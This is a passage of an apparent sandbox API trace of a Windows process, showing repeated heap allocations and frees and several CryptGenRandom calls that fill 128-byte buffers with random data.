phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.250] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.250] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0033.250] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eb078 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d08 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead30 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2ecd18 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9520 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.252] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.253] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.254] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead30 | out: hHeap=0x2b0000) returned 1 [0033.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0033.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecd18 | out: hHeap=0x2b0000) returned 1 [0033.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0033.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e96d0 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9760 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e97f0 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9880 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9910 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e99a0 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9a30 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9ac0 [0033.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9b50 [0033.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9be0 [0033.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9c70 [0033.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d00 [0033.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d90 [0033.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9e20 [0033.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e96d0 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0033.259] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0033.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb078 | out: hHeap=0x2b0000) returned 1 [0033.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0033.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac90 | out: hHeap=0x2b0000) returned 1 [0033.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0033.260] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0033.260] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.260] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.260] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.261] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.261] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.261] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0033.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac90 [0033.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.261] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.262] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.262] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.262] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.263] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.263] CryptReleaseContext 